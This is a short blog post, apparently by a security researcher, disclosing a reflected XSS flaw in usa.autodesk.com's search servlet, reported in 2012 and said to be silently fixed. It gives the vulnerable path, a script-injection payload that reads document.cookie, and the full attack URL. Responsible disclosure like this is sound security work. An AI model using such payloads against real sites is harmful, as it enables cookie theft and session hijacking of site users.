This is a reported "Reflected XSS" found on autodesk.com which i've reported it responsibly on 30/06/2012 and they have fixed it silently without replying.
Severity: Reflected XSS
Confidence: Certain
Host: http://usa.autodesk.com/
Path: /adsk/servlet/u/gsearch/results?siteID=123112&catID=123155&id=2088334&qt=
Issue detail:
What i did was to enter the below XSS vector in the search field.
</script><script>alert(document.cookie)</script>
The final url is like below:
http://usa.autodesk.com/adsk/servlet/u/gsearch/results?siteID=123112&catID=123155&id=2088334&qt=</script><script>alert(document.cookie)</script>&x=0&y=0
This is the screenshot after i sent the payload.
Reported by: Jacob Soo
Vendor Notification: June 30, 2012
Resolution: Vendor silently fixed it
No comments:
Post a Comment